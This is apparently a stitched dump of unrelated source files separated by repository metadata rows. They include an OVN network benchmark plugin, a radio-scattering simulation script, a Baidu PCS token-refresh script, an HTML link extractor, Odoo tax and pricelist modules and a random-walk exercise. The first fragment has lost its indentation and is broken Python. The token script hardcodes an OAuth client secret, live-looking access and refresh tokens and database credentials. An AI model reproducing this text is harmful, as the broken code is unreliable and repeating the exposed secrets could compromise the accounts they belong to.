port_bind_args = port_bind_args or {}
wait_up = port_bind_args.get("wait_up", False)
# "wait_sync" takes effect only if wait_up is True.
# By default we wait for all HVs catching up with the change.
wait_sync = port_bind_args.get("wait_sync", "hv")
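        # Illustrative example of the expected arguments (assumed, not from the
        # original scenarios):
        #   port_bind_args = {"internal": True, "wait_up": True, "wait_sync": "hv"}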
if wait_sync.lower() not in ['hv', 'sb', 'none']:
raise exceptions.InvalidConfigException(_(
"Unknown value for wait_sync: %s. "
"Only 'hv', 'sb' and 'none' are allowed.") % wait_sync)
LOG.info("Bind lports method: %s" % self.install_method)
self._bind_ports(lports, sandboxes, port_bind_args)
if wait_up:
self._wait_up_port(lports, wait_sync)
def _bind_ovs_internal_vm(self, lport, sandbox, ovs_ssh):
port_name = lport["name"]
port_mac = lport["mac"]
port_ip = lport["ip"]
# TODO: some containers don't have ethtool installed
if not sandbox["host_container"]:
# Disable tx offloading on the port
ovs_ssh.run('ethtool -K {p} tx off &> /dev/null'.format(p=port_name))
ovs_ssh.run('ip netns add {p}'.format(p=port_name))
ovs_ssh.run('ip link set {p} netns {p}'.format(p=port_name))
ovs_ssh.run('ip netns exec {p} ip link set {p} address {m}'.format(
p=port_name, m=port_mac)
)
ovs_ssh.run('ip netns exec {p} ip addr add {ip} dev {p}'.format(
p=port_name, ip=port_ip)
)
ovs_ssh.run('ip netns exec {p} ip link set {p} up'.format(
p=port_name)
)
# Add route for multicast traffic
ovs_ssh.run('ip netns exec {p} ip route add 224/4 dev {p}'.format(
p=port_name)
)
# Store the port in the context so we can use its information later
# on or at cleanup
self.context["ovs-internal-ports"][port_name] = (lport, sandbox)
def _delete_ovs_internal_vm(self, port_name, ovs_ssh, ovs_vsctl):
ovs_vsctl.del_port(port_name)
ovs_ssh.run('ip netns del {p}'.format(p=port_name))
def _flush_ovs_internal_ports(self, sandbox):
stdout = StringIO()
host_container = sandbox["host_container"]
sb_name = sandbox["name"]
farm = sandbox["farm"]
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method, host_container)
ovs_vsctl.run("find interface type=internal", ["--bare", "--columns", "name"], stdout=stdout)
output = stdout.getvalue()
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method, host_container)
for name in list(filter(None, output.splitlines())):
if "lp" not in name:
continue
self._delete_ovs_internal_vm(name, ovs_ssh, ovs_vsctl)
def _cleanup_ovs_internal_ports(self, sandboxes):
conns = {}
for sandbox in sandboxes:
sb_name = sandbox["name"]
farm = sandbox["farm"]
host_container = sandbox["host_container"]
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.set_sandbox(sb_name, self.install_method,
host_container)
ovs_ssh.enable_batch_mode()
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
host_container)
ovs_vsctl.enable_batch_mode()
conns[sb_name] = (ovs_ssh, ovs_vsctl)
for _, (lport, sandbox) in self.context["ovs-internal-ports"].items():
sb_name = sandbox["name"]
(ovs_ssh, ovs_vsctl) = conns[sb_name]
self._delete_ovs_internal_vm(lport["name"], ovs_ssh, ovs_vsctl)
for _, (ovs_ssh, ovs_vsctl) in conns.items():
ovs_vsctl.flush()
ovs_ssh.flush()
@atomic.action_timer("ovn_network.bind_port")
def _bind_ports(self, lports, sandboxes, port_bind_args):
internal = port_bind_args.get("internal", False)
sandbox_num = len(sandboxes)
lport_num = len(lports)
lport_per_sandbox = int((lport_num + sandbox_num - 1) / sandbox_num)
if (len(lports) < len(sandboxes)):
for lport in lports:
sandbox_data = random.choice(sandboxes)
farm = sandbox_data['farm']
sandbox = sandbox_data['name']
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
sandbox_data['host_container'])
ovs_vsctl.enable_batch_mode()
port_name = lport["name"]
port_mac = lport["mac"]
port_ip = lport["ip"]
LOG.info("bind %s to %s on %s" % (port_name, sandbox, farm))
ovs_vsctl.add_port('br-int', port_name, internal=internal)
ovs_vsctl.db_set('Interface', port_name,
('external_ids', {"iface-id": port_name,
"iface-status": "active"}),
('admin_state', 'up'))
ovs_vsctl.flush()
# If it's an internal port create a "fake vm"
if internal:
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
self._bind_ovs_internal_vm(lport, sandbox_data, ovs_ssh)
ovs_ssh.flush()
else:
j = 0
for i in range(0, len(lports), lport_per_sandbox):
lport_slice = lports[i:i+lport_per_sandbox]
sandbox = sandboxes[j]["name"]
farm = sandboxes[j]["farm"]
ovs_vsctl = self.farm_clients(farm, "ovs-vsctl")
ovs_vsctl.set_sandbox(sandbox, self.install_method,
sandboxes[j]["host_container"])
ovs_vsctl.enable_batch_mode()
for index, lport in enumerate(lport_slice):
port_name = lport["name"]
LOG.info("bind %s to %s on %s" % (port_name, sandbox, farm))
ovs_vsctl.add_port('br-int', port_name, internal=internal)
ovs_vsctl.db_set('Interface', port_name,
('external_ids', {"iface-id":port_name,
"iface-status":"active"}),
('admin_state', 'up'))
if index % 400 == 0:
ovs_vsctl.flush()
ovs_vsctl.flush()
# If it's an internal port create a "fake vm"
if internal:
ovs_ssh = self.farm_clients(farm, "ovs-ssh")
ovs_ssh.enable_batch_mode()
for index, lport in enumerate(lport_slice):
self._bind_ovs_internal_vm(lport, sandboxes[j], ovs_ssh)
if index % 200 == 0:
ovs_ssh.flush()
ovs_ssh.flush()
j += 1
@atomic.action_timer("ovn_network.wait_port_up")
def _wait_up_port(self, lports, wait_sync):
LOG.info("wait port up. sync: %s" % wait_sync)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(True)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
for index, lport in enumerate(lports):
ovn_nbctl.wait_until('Logical_Switch_Port', lport["name"], ('up', 'true'))
if index % 400 == 0:
ovn_nbctl.flush()
if wait_sync != "none":
ovn_nbctl.sync(wait_sync)
@atomic.action_timer("ovn_network.list_oflow_count_for_sandboxes")
def _list_oflow_count_for_sandboxes(self, sandboxes,
sandbox_args):
oflow_data = []
for sandbox in sandboxes:
sandbox_name = sandbox["name"]
farm = sandbox["farm"]
            host_container = sandbox["host_container"]
ovs_ofctl = self.farm_clients(farm, "ovs-ofctl")
ovs_ofctl.set_sandbox(sandbox_name, self.install_method,
host_container)
bridge = sandbox_args.get('bridge', 'br-int')
lflow_count = ovs_ofctl.dump_flows(bridge)
LOG.debug('openflow count on %s is %s' % (sandbox_name, lflow_count))
oflow_data.append([sandbox_name, lflow_count])
# Leverage additive plot as each sandbox has just one openflow count.
additive_oflow_data = {
"title": "Openflow count on each sandbox in StackedArea",
"description": "Openflow count on each sandbox",
"chart_plugin": "StackedArea", "data": oflow_data
}
self.add_output(additive_oflow_data)
def _create_address_set(self, set_name, address_list):
LOG.info("create %s address_set [%s]" % (set_name, address_list))
name = "name=\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.create("Address_Set", name, ('addresses', addr_list))
ovn_nbctl.flush()
def _address_set_add_addrs(self, set_name, address_list):
LOG.info("add [%s] to address_set %s" % (address_list, set_name))
name = "\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.add("Address_Set", name, ('addresses', ' ', addr_list))
ovn_nbctl.flush()
def _address_set_remove_addrs(self, set_name, address_list):
LOG.info("remove [%s] from address_set %s" % (address_list, set_name))
name = "\"" + set_name + "\""
addr_list="\"" + address_list + "\""
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.remove("Address_Set", name, ('addresses', ' ', addr_list))
ovn_nbctl.flush()
def _list_address_set(self):
stdout = StringIO()
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
ovn_nbctl.run("list address_set", ["--bare", "--columns", "name"], stdout=stdout)
ovn_nbctl.flush()
output = stdout.getvalue()
return output.splitlines()
def _remove_address_set(self, set_name):
LOG.info("remove %s address_set" % set_name)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.destroy("Address_Set", set_name)
ovn_nbctl.flush()
def _get_address_set(self, set_name):
LOG.info("get %s address_set" % set_name)
ovn_nbctl = self.controller_client("ovn-nbctl")
ovn_nbctl.set_sandbox("controller-sandbox", self.install_method,
self.context['controller']['host_container'])
ovn_nbctl.enable_batch_mode(False)
ovn_nbctl.set_daemon_socket(self.context.get("daemon_socket", None))
return ovn_nbctl.get("Address_Set", set_name, 'addresses')
|
apache-2.0
| 7,730,396,663,554,991,000
| 41.743243
| 101
| 0.561769
| false
| 3.651371
| false
| false
| false
|
krosenfeld/scatterbrane
|
docs/_code/time_variability.py
|
1
|
3849
|
'''
Generate a time series incorporating the motion of the screen across the source.
This script may take a long time to run. I suggest you read through it first and
adjust the num_samples variable to check out its performance.
'''
import numpy as np
from scipy.ndimage import imread
import time
import matplotlib.pyplot as plt
from palettable.cubehelix import jim_special_16
cmap = jim_special_16.mpl_colormap
plt.rcParams['image.origin'] = 'lower'
plt.rcParams['patch.edgecolor'] = 'white'
plt.rcParams['lines.linewidth'] = 2
from scatterbrane import Brane,utilities
# set up logger
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
# import our source image and covert it to gray scale
src_file = 'source_images/nh_01_stern_05_pluto_hazenew2.square.jpg'
rgb = imread(src_file)[::-1]
I = (np.array([0.2989,0.5870,0.1140])[np.newaxis,np.newaxis,:]*rgb).sum(axis=-1)
I *= np.pi/I.sum()
# make up some scale for our image.
write_figs = False
wavelength=1e-3
FOV = 90.
dx = FOV/I.shape[0]
# initialize the scattering screen @ 0.87mm
b = Brane(I,dx,wavelength=0.87e-3,nphi=(2**12,2**14),anisotropy=1,pa=None,r_inner=50,live_dangerously=True)
# estimate the time resolution of our simulation assuming some screen velocity.
screen_velocity = 200. #km/s
fs = screen_velocity/(b.screen_dx*b.ips) # Hz
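# (Illustrative note, not in the original: the line above assumes screen_velocity is
# in km/s and that b.screen_dx*b.ips gives, in km, the distance the screen moves
# between consecutive samples, so fs comes out in Hz.)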
num_samples = b.nphi[1]/b.ips - b.nx # try num_samples = 100 for testing porpoises.
logger.info('Number of samples: {0:g}'.format(num_samples))
logger.info('Sampling interval: {0:g}s'.format(1./fs))
logger.info('Time coverage: {0:g} days'.format(num_samples/fs/(3600.*24.)))
# generate the screen (this takes a while)
logger.info('generating screen...')
tic = time.time()
b.generatePhases()
logger.info('took {0:g}s'.format(time.time()-tic))
# generate time series (this takes a while)
logger.info('generating time series...')
fluxes = []
frames = []
tic = time.time()
for i in range(num_samples):
# update source image to include a sinusoidal flux modulation
b.setModel(I*(1. - 0.4*np.sin(2*np.pi*i/(2*num_samples))), dx) # comment out to speedup
b.scatter(move_pix=i*b.ips)
fluxes.append(b.iss.sum())
frames.append(b.iss)
logger.info('took {0:g}s'.format(time.time()-tic))
# 1962.92s
# make figures
fig_file = '../_static/time_variability/'
extent=b.dx*b.nx//2*np.array([1,-1,-1,1])
plt.figure()
plt.subplot(121)
isrc_smooth = utilities.smoothImage(b.isrc,b.dx,2.*b.dx)
plt.imshow(isrc_smooth,extent=extent,cmap=cmap)
plt.xlabel('$\Delta\\alpha$ [$\mu$as]'); plt.ylabel('$\Delta\delta$ [$\mu$as]')
plt.subplot(122)
iss_smooth = utilities.smoothImage(b.iss,b.dx,2.*b.dx)
plt.imshow(iss_smooth,extent=extent,cmap=cmap)
plt.gca().set_yticklabels(10*['']); plt.gca().set_xticklabels(10*[''])
if write_figs: plt.savefig(fig_file+'/iss.png',bbox_inches='tight')
plt.figure()
t = 1./fs*np.arange(len(fluxes))/3600.
plt.plot(t,fluxes,color='#377EB8')
plt.xlabel('time [hr]')
plt.ylabel('flux [Jy]')
plt.xlim([0,t.max()])
plt.grid()
if write_figs: plt.savefig(fig_file+'/flux.png',bbox_inches='tight')
# and a movie
import matplotlib.animation as animation
i = 0
def updatefig(*args):
global i
i = (i + 1) % num_samples
im.set_array(utilities.smoothImage(frames[i],b.dx,2*b.dx))
return im
plt.show()
fig = plt.figure(figsize=(8,6))
im = plt.imshow(utilities.smoothImage(frames[0],b.dx,2*b.dx), cmap=cmap, animated=True,
extent=extent, interpolation=None)
plt.xlabel('$\Delta\\alpha$ [$\mu$as]')
plt.ylabel('$\Delta\delta$ [$\mu$as]')
ani = animation.FuncAnimation(fig, updatefig, interval=50, blit=False, frames=int(1000))
Writer = animation.writers['ffmpeg']
writer = Writer(fps=15, metadata=dict(artist='Katherine Rosenfeld'), bitrate=1800)
if write_figs:
logger.info('writing movie!')
ani.save('mov.mp4',writer=writer)
plt.close()
else:
plt.show()
|
mit
| -1,363,312,966,128,243,000
| 32.763158
| 107
| 0.704858
| false
| 2.777056
| false
| false
| false
|
matrixorz/justpic
|
justpic/etc/pcstool.py
|
1
|
1581
|
{"expires_in":2592000,"refresh_token":"22.ca7aeff542c491ee0c9de8a3010a9de4.315360000.1724417263.3875775130-1056026","access_token":"21.8bdf77c07a392aea779d571a24903d45.2592000.1411649263.3875775130-1056026","session_secret":"8ddef6d7ab2a0b36034c53a46bcbb6c0","session_key":"9mnRfHBbgiKJcCaPaY1v1Qjo2\/VryC6ZM+X+sorRrQ6C8hWQeryRbEXcZmR2RyHGaDPD8yD8\/LGm+jHuvnVhx6fV0IO5EEJGmQ==","scope":"basic netdisk"}
# "refresh_token":"22.ca7aeff542c491ee0c9de8a3010a9de4.315360000.1724417263.3875775130-1056026"
# "access_token":"21.8bdf77c07a392aea779d571a24903d45.2592000.1411649263.3875775130-1056026"
client_id='oA8jMPTjA8yrtaGsc2i5HHdx'
client_secret='kas6A0XFr7uArRnXL4Da0GCvyxRqRiWw'
# get the forever token?
import MySQLdb
db = MySQLdb.connect("localhost","david","david","picturetoken")
cursor=db.cursor()
cursor.execute("select * from picturetoken")
rs=cursor.fetchone()
# cursor.close
print rs
print rs[2]
refresh_token=rs[2]
from baidupcs.tools import get_new_access_token
response=get_new_access_token(refresh_token,client_id,client_secret)
access_token=response.json()['access_token']
refresh_token=response.json()['refresh_token']
print access_token
print refresh_token
print type(access_token)
# cursor=db.cursor()
# print
# add_salary = """insert into picturetoken(access_token, refresh_token) values(%s,%s)""" ,(access_token,refresh_token)
# print add_salary
cursor.execute("delete from picturetoken")
cursor.execute( """insert into picturetoken(access_token, refresh_token) values(%s,%s)""" ,(str(access_token),str(refresh_token)))
cursor.close()
db.commit()
db.close()
|
mit
| 5,203,383,678,631,350,000
| 41.72973
| 402
| 0.794434
| false
| 2.478056
| false
| true
| false
|
surajsinghbisht054/Information_Gathering_Python_Web_Scraping_Scripts
|
html_link_extractor/link_re.py
|
1
|
1087
|
#!/usr/bin/python
##################################################
######## Please Don't Remove Author Name #########
############### Thanks ###########################
##################################################
#
#
__author__='''
Suraj Singh
surajsinghbisht054@gmail.com
https://bitforestinfo.blogspot.in/
'''
# Import Module
import urllib.request, urllib.error, urllib.parse
import sys
import re
if len(sys.argv)==1:
print("[*] Please Provide Domain Name:\n Usages: python link_re.py www.examplesite.com\n")
sys.exit(0)
# Retrieve Html Data From Url
def get_html(url):
try:
        page = urllib.request.urlopen(url).read().decode('utf-8', errors='replace')  # decode bytes (UTF-8 assumed) so the str regexes below match
except Exception as e:
print("[Error Found] ",e)
page=None
return page
html_data=get_html(sys.argv[1])
# Condition
if html_data:
pattern = re.compile('(<a .*?>)') # First, Find all <a > tag
a_tag_captured = pattern.findall(html_data)
for i in a_tag_captured: # Second, Now Find href tag in all tag
href=re.search('href=.*', i[1:-1])
if href: # If Tag Found
print(href.group().split(' ')[0]) # Print Tag
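# Illustrative invocation (assumed, not part of the original script):
#   python link_re.py http://www.example.com
# prints the href="..." portion of every <a ...> tag found in the page.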
|
apache-2.0
| -3,389,522,426,765,960,000
| 24.880952
| 91
| 0.563017
| false
| 3.159884
| false
| false
| false
|
open-synergy/opnsynid-l10n-indonesia
|
l10n_id_taxform_retur_pajak_masukan/models/retur_pajak_masukan.py
|
1
|
2380
|
# -*- coding: utf-8 -*-
# Copyright 2017 OpenSynergy Indonesia
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from openerp import models, fields, api
class ReturPajakMasukan(models.Model):
_name = "l10n_id.retur_pajak_masukan"
_description = "Retur Pajak Masukan"
_inherit = ["l10n_id.faktur_pajak_common"]
@api.model
def _get_faktur_pajak_type(self):
return self.env.ref(
"l10n_id_taxform_retur_pajak_masukan.fp_type_rp_masukan")
name = fields.Char(
string="# Retur Pajak Masukan",
)
enofa_nomor_dokumen = fields.Char(
string="NOMOR_DOKUMEN_RETUR",
)
enofa_tanggal_dokumen = fields.Char(
string="TANGGAL_RETUR",
)
enofa_masa_pajak = fields.Char(
string="MASA_PAJAK_RETUR",
)
enofa_tahun_pajak = fields.Char(
string="TAHUN_PAJAK_RETUR",
)
enofa_jumlah_dpp = fields.Char(
string="NILAI_RETUR_DPP",
)
enofa_jumlah_ppn = fields.Char(
string="NILAI_RETUR_PPN",
)
enofa_jumlah_ppnbm = fields.Char(
string="NILAI_RETUR_PPNBM",
)
enofa_nomor_dokumen_balik = fields.Char(
string="NOMOR_FAKTUR",
)
enofa_tanggal_dokumen_balik = fields.Char(
string="TANGGAL_FAKTUR",
)
reference_id = fields.Many2one(
string="Doc. Reference",
comodel_name="account.move",
)
reference_ids = fields.Many2many(
string="Doc. References",
comodel_name="account.move",
relation="rel_rp_masukan_2_move",
column1="rp_masukan_id",
column2="move_id",
)
all_reference_ids = fields.Many2many(
string="Doc. References",
comodel_name="account.move",
relation="rel_rp_masukan_2_all_move",
compute="_compute_all_reference",
column1="rp_masukan_id",
column2="move_id",
store=True,
)
reverse_id = fields.Many2one(
string="Reverse From",
comodel_name="l10n_id.faktur_pajak_masukan",
)
substitute_id = fields.Many2one(
string="Substitute For",
comodel_name="l10n_id.retur_pajak_masukan",
)
@api.onchange("reference_id")
def onchange_reference_id(self):
if self.reference_id:
self.name = self.reference_id.name
|
agpl-3.0
| 1,572,841,041,619,940,400
| 27.382716
| 69
| 0.584454
| false
| 2.941904
| false
| false
| false
|
artopping/nyu-python
|
course1/assignment_6/rf_random_walk.py
|
1
|
2312
|
#!/usr/bin/env python3
import random
import sys
import math
def get_random_direction():
direction = ""
probability = random.random()
if probability < 0.25:
direction = "west"
elif 0.25<=probability<0.5:
direction= "north"
elif 0.5<= probability<0.75:
direction= "south"
else:
direction = "east"
return direction
def get_direction_displacement():
displacements = {
'west': (-1, 0),
'east': (1, 0),
'north': (0, 1),
'south': (0, -1)
}
displacement = displacements.get(get_random_direction())
return displacement
def take_walk(steps):
current_location = [0, 0]
for step_index in range(steps):
direction = get_random_direction()
displacement = get_direction_displacement()
# extract the numerical values from the tuple
delta_x = displacement[0]
delta_y = displacement[1]
current_location[0] += delta_x
current_location[1] += delta_y
return current_location
# UPDATE current_location HERE
# consult example in 'Storing and Updating State' for method to update
# current_location
def take_all_walks(steps, runs):
endpoints = []
for run_index in range(runs):
end_location = take_walk(steps)
endpoints.append(end_location)
    return endpoints
def average_final_distance(endpoints):
total_distance = 0
for coords in endpoints:
dx = coords[0]
dy = coords[1]
#use the Pythagorean theorem to get distance like last session
distance = math.sqrt(dx**2 + dy**2)
total_distance += distance
return total_distance / len(endpoints)
if __name__ == "__main__":
steps = 10
if len(sys.argv) > 1:
steps = int(sys.argv[1])
runs = 1
if len(sys.argv) > 2:
runs = int(sys.argv[2])
end_locations = take_all_walks(steps, runs)
current_location = take_walk(steps)
#if len(sys.argv) > 1:
#steps = int(sys.argv[1])
print("Done with walk, printing end location: ")
#print(current_location)
print (end_locations)
average_displacement = average_final_distance(end_locations)
print(average_displacement)
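    # Illustrative sanity check (not part of the original script): for an unbiased
    # 2-D walk the mean final distance grows roughly like sqrt(steps), so the value
    # above can be compared against this rough reference.
    print("sqrt(steps) for comparison: {}".format(math.sqrt(steps)))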
|
mit
| -265,223,460,572,834,500
| 26.855422
| 78
| 0.609429
| false
| 3.664025
| false
| false
| false
|
Micronaet/micronaet-migration
|
report_product_pricelist/wizard/create_pricelist.py
|
1
|
18271
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ODOO (ex OpenERP)
# Open Source Management Solution
# Copyright (C) 2001-2015 Micronaet S.r.l. (<http://www.micronaet.it>)
# Developer: Nicola Riolini @thebrush (<https://it.linkedin.com/in/thebrush>)
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp import SUPERUSER_ID, api
from openerp import tools
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
class MicronaetInvoiceLine(orm.Model):
''' Invoice line
'''
_name = 'micronaet.invoice.line'
_description = 'Invoice line'
_order = 'date'
_columns = {
'name': fields.char('Invoice number', size=10, required=True),
'partner': fields.char('Invoice number', size=9),
'price': fields.char('Invoice number', size=15),
'quantity': fields.char('Invoice number', size=10),
'product': fields.char('Invoice number', size=10),
'date': fields.char('Invoice number', size=10),
}
# Product pricelist from model to generated:
class product_pricelist_generator(orm.TransientModel):
""" Product pricelist generator
Copy an inactive pricelist creating a new pricelist with all product
and calculate the price with actual pricelist rules
"""
_name = "product.pricelist.generator"
_description = "Product pricelist generator"
_columns = {
'pricelist_org_id': fields.many2one(
'product.pricelist', 'Original pricelist', required=True,
help="Choose original pricelist used to calculate new complete "
"pricelist/version"),
'new': fields.boolean('New',
help="Generate a new pricelist with this name"),
'new_name': fields.char('New version name', size=64),
'pricelist_des_id': fields.many2one(
'product.pricelist', 'Destination pricelist',
help="If no new pricelist, use this pricelist to upgrade fields"),
}
_defaults = {
'new': lambda *x: True,
}
def do_create_update(self, cr, uid, ids, context=None):
""" Create or update pricelist
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of ids
@return: Dictionary {}
"""
if context is None:
context={}
wiz_browse = self.browse(cr, uid, ids[0], context=context)
pricelist_ref_id = wiz_browse.pricelist_org_id.id
        if wiz_browse.new:  # for now we only handle this case
if not wiz_browse.new_name: # TODO and duplicated!
                # TODO communicate error!
return {'type': 'ir.actions.act_window_close'}
# Create new pricelist and pricelist version
pricelist_id = self.pool.get('product.pricelist').create(cr, uid, {
'name': wiz_browse.new_name,
'type': 'sale',
'tipology': 'historical',
})
if pricelist_id:
version_id = self.pool.get('product.pricelist.version').create(
cr, uid, {
'name': "Versione: " + wiz_browse.new_name + \
" definitiva",
#'date_end': False,
#'date_start': False,
#'company_id': False,
#'active': True,
'pricelist_id': pricelist_id,
})
else:
pass
else:
# Get pricelist and pricelist version
pricelist_id = 0
version_id = 0
        # pricelist/version created or found; the origin pricelist must also exist
if pricelist_id and version_id and wiz_browse.pricelist_org_id:
product_ids = self.pool.get('product.product').search(
cr, uid, [('mexal_id', 'ilike', 'C')], context=context)
# TODO write right filter
for product in self.pool.get('product.product').read(
cr, uid, product_ids, ['id', 'name', 'code']):
if product['code'][0:1].upper() == "C":
price_calc = self.pool.get('product.pricelist').price_get(
cr, uid, [pricelist_ref_id], product['id'], 1.0, False, {
'uom': False,
'date': False,
})[pricelist_ref_id]
self.pool.get('product.pricelist.item').create(
cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
#'base_pricelist_id': False,
'sequence': 200,
'price_max_margin': 0.0,
#'company_id': False,
#'product_tmpl_id': False,
'product_id': product['id'],
'base': 1,
#[3, 'Rif. anno 2011'],
'price_version_id': version_id,
'min_quantity': 1,
# TODO Calcolare in funzione del listino
'price_surcharge': price_calc,
#'price_min_margin': 0.0,
#'categ_id': False,
'name': "[%s] %s"%(product['code'], product['name']),
})
else:
            pass  # TODO communicate error!
return {'type': 'ir.actions.act_window_close'}
# Product pricelist for customer:
class product_pricelist_customer(orm.TransientModel):
""" Product pricelist generator for customers
"""
_name = "product.pricelist.customer"
_description = "Product pricelist customer"
_columns = {
'partner_id': fields.many2one('res.partner', 'Partner', required=True,
help="Choose partner to create custom pricelist or "
"add quotations"),
'comment': fields.char('Comment', size=64,
help="Need to be created or updated"),
'product_id': fields.many2one('product.product', 'Product',
required=True),
'pricelist_id': fields.many2one(
'product.pricelist', 'Current pricelist', required=True,
help="Choose original pricelist used to calculate new complete "
"pricelist/version"),
'pricelist_model_history_id': fields.many2one(
'product.pricelist', 'Listino di riferimento',
help="Listino di riferimento applicato nel caso mancassero degli "
"articoli nel listino di base (usato per avere un raffronto "
"nel caso esistessero particolarità"),
'pricelist_model_id': fields.many2one(
'product.pricelist', 'Listino di paragone',
help="Listino di paragone per avere un raffronto con il prezzo "
"attuale del prodotto"),
'price': fields.float('Price listino cliente', digits=(16, 5)),
'price_model_history': fields.float(
'Prezzo list di rif.', digits=(16, 5)),
'price_model': fields.float('Prezzo di paragone', digits=(16, 5)),
'price_history': fields.text('Prezzo storico'),
'price_invoice_history': fields.text('Prezzo storico fatturato'),
}
# on change function
def onchange_pricelist(self, cr, uid, ids, pricelist_id, product_id,
context=None):
''' Read price from pricelist for product
'''
if context is None:
context={}
res = {'value': {}}
        if pricelist_id:  # look up the pricelist
res['value']['price']=self.pool.get('product.pricelist').price_get(
cr, uid, [pricelist_id], product_id , 1.0, False, {
'uom': False, 'date': False})[pricelist_id]
            return res  # stop here for now
        # Reset the price
return {'value': {'price': False}}
def onchange_partner_pricelist(self, cr, uid, ids, partner_id,
pricelist_id, product_id, context = None):
'''Create a new pricelist if not custom
add custom price
add old version as reference
'''
if context is None:
context = {}
res={'value': {}}
        if partner_id:  # look up the pricelist
partner = self.pool.get("res.partner").browse(cr, uid, partner_id)
partner_pricelist_id = partner.property_product_pricelist.id or 0
# pricelist_id only if not passed (to keep the change)
if not pricelist_id:
pricelist_id=partner_pricelist_id
res['value']['pricelist_id']=pricelist_id
res['value'][
'pricelist_model_history_id'] = \
partner.pricelist_model_history_id.id or 0
res['value']['pricelist_model_id'] = \
partner.pricelist_model_id.id or 0
            return res  # stop here for now
return {'value': {}}
def onchange_partner_pricelist_product(self, cr, uid, ids, partner_id,
pricelist_id, product_id, pricelist_model_history_id,
pricelist_model_id, context = None):
'''Create a new pricelist if not custom
add custom price
add old version as reference
'''
if context is None:
context = {}
res = {'value': {}}
        if product_id and pricelist_id:  # look up the pricelist
res['value']['price'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_id], product_id , 1.0, False, {
'uom': False,
'date': False,
})[pricelist_id] if pricelist_id else ""
res['value']['price_model_history'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_model_history_id], product_id , 1.0,
False, {
'uom': False,
'date': False,
})[pricelist_model_history_id] if \
pricelist_model_history_id else ""
res['value']['price_model'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_model_id], product_id , 1.0, False, {
'uom': False,
'date': False,
})[pricelist_model_id] if pricelist_model_id else ""
# Order history:
order_line_ids = self.pool.get('sale.order.line').search(
cr, uid, [
('product_id','=',product_id),
('order_partner_id','=',partner_id),
])
if order_line_ids:
list_quotation = "%20s%20s%20s%40s\n" % (
"Data", "Ordine", "Prezzo", "Commento")
for line in self.pool.get('sale.order.line').browse(
cr, uid, order_line_ids):
list_quotation += "%20s%20s%20s%40s\n" % (
datetime.strptime(
line.order_id.date_order, '%Y-%m-%d').strftime(
'%d/%m/%Y'),
line.order_id.name,
line.price_unit,
line.price_comment or "")
res['value']['price_history'] = list_quotation
else:
res['value']['price_history'] = ""
# Invoice history:
product_proxy = self.pool.get('product.product').browse(
cr, uid, product_id)
product_code = product_proxy.code #"C3114409"
partner_proxy = self.pool.get('res.partner').browse(
cr, uid, partner_id)
partner_code = partner_proxy.mexal_c #"230.00179" # TODO parametrize
invoice_line_ids = self.pool.get('micronaet.invoice.line').search(
cr, uid, [
('product','=',product_code),
('partner','=',partner_code),
])
if invoice_line_ids:
list_quotation = "%20s%20s%20s%20s\n" % (
"Data","Fattura","Prezzo", "Q.")
for line in self.pool.get('micronaet.invoice.line').browse(
cr, uid, invoice_line_ids):
list_quotation += "%20s%20s%20s%20s\n" % (
datetime.strptime(line.date, '%Y%m%d').strftime(
'%d/%m/%Y'), line.name, line.price, line.quantity)
res['value']['price_invoice_history'] = list_quotation
else:
res['value']['price_invoice_history'] = ""
return res
        # Reset everything:
return {'value': {
'price': False,
'price_model_history': False,
'price_model': False,
'price_history': False,
'price_invoice_history': False,
}}
# event function
